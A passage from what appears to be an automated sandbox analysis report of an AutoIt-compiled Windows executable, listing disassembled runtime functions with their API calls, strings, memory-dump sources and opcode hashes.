                                          • Opcode Fuzzy Hash: 41228ff7671f9682f9b6d03763af75e197d0498e00f4346dbecb48c30a1468d4
                                          • Instruction Fuzzy Hash: 9F01D671E41208BBCB04EBA4E982EFF77ACEF15300F255115BA1277293DA61AF0C9275
                                          Function 00E16DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __calloc_crt
                                          • String ID: @R
                                          • API String ID: 3494438863-2347139750
                                          • Opcode ID: 48b4be132de49f39c412d41eb56a4a6bdc9a5d2709125b0f8ecde671d132d70d
                                          • Instruction ID: d8b1204d8751cfbbc62cc5ba9cd86b5db730d4da8c71ecded3ded3fb78edb7c3
                                          • Opcode Fuzzy Hash: 48b4be132de49f39c412d41eb56a4a6bdc9a5d2709125b0f8ecde671d132d70d
                                          • Instruction Fuzzy Hash: 44F06272308616DFFB28EF5ABD516E627D5EB45724B14562AF204FA1B0EB3488C58680
                                          Function 00E551CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          • Opcode ID: fd4c8047c6f93ddd966a20596e296b11e92322504efb71c232e7349940774f01
                                          • Instruction ID: ade8fd83ebfaabd6b41c3fddb9bff950bbf02f062af427a3c9ba4cbe3687bc78
                                          • Opcode Fuzzy Hash: fd4c8047c6f93ddd966a20596e296b11e92322504efb71c232e7349940774f01
                                          • Instruction Fuzzy Hash: 2BE02B325003291AD72096959C05BA7F7ACEB45721F000167FD14E3050E560A94987E0
                                          Function 00E481BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E481CA
                                            • Part of subcall function 00E13598: _doexit.LIBCMT ref: 00E135A2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Message_doexit
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 1993061046-4017498283
                                          • Opcode ID: d0242b816d2fc937dde0d734719408d3ed4b649c5d7a82d8d4942385d72578c5
                                          • Instruction ID: 19a87256452ba847ea942a6e3ecb61b39dd3315b824237e0401c988c3a89cc48
                                          • Opcode Fuzzy Hash: d0242b816d2fc937dde0d734719408d3ed4b649c5d7a82d8d4942385d72578c5
                                          • Instruction Fuzzy Hash: A7D05B323C531836D21532F96D07FCA7A884B09F56F105056FB0C755D38DD199C243E9
                                          Function 00E2B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E2B564: _memset.LIBCMT ref: 00E2B571
                                            • Part of subcall function 00E10B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E2B540,?,?,?,00DF100A), ref: 00E10B89
                                          • IsDebuggerPresent.KERNEL32(?,?,?,00DF100A), ref: 00E2B544
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DF100A), ref: 00E2B553
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E2B54E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3158253471-631824599
                                          • Opcode ID: 439a4879e707c894b00ddb57ea073a9cf6fd9cd6f3f33099ddb99831e349051a
                                          • Instruction ID: 01512e1c85c91d88dbd997ca97024a4114fa50d7f65c36416cc0da32c032142d
                                          • Opcode Fuzzy Hash: 439a4879e707c894b00ddb57ea073a9cf6fd9cd6f3f33099ddb99831e349051a
                                          • Instruction Fuzzy Hash: D3E092702003208FDB21DF29E8047427BE4AF00704F04992DE586EB361DBB8D488CBA1